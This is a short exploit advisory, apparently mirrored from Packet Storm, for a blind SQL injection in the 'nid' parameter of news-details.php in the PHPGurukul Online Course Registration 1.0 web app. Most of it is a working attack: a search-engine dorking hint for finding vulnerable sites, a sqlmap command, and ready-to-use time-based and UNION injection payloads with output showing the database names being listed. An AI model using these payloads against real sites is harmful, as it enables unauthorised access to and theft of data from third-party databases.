Share
## https://sploitus.com/exploit?id=PACKETSTORM:181292
=============================================================================================================================================  
| # Title : Online course registartion 1.0 Blind SQl INjection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits) |  
| # Vendor : https://phpgurukul.com/wp-content/uploads/2018/05/Online-course-registartion-Using-PHP.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] Use Payload : news-details.php?nid=if <====== inject here  
  
[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1//onlinecourse/news-details.php?nid=if --dbs  
  
---  
Parameter: nid (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: nid=if' AND (SELECT 2934 FROM (SELECT(SLEEP(5)))FpMu) AND 'XUff'='XUff  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 4 columns  
Payload: nid=if' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178787a71,0x41555a676d41466755754547656455487a544c50476163444b6d6a684b744d506c6c4e4b4e654550,0x7178766271)-- -  
---  
[14:13:02] [INFO] the back-end DBMS is MySQL  
web application technology: PHP, Apache 2.4.58, PHP 8.0.30  
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)  
[14:13:02] [INFO] fetching database names  
available databases [1]:  
[*] onlinecourse  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================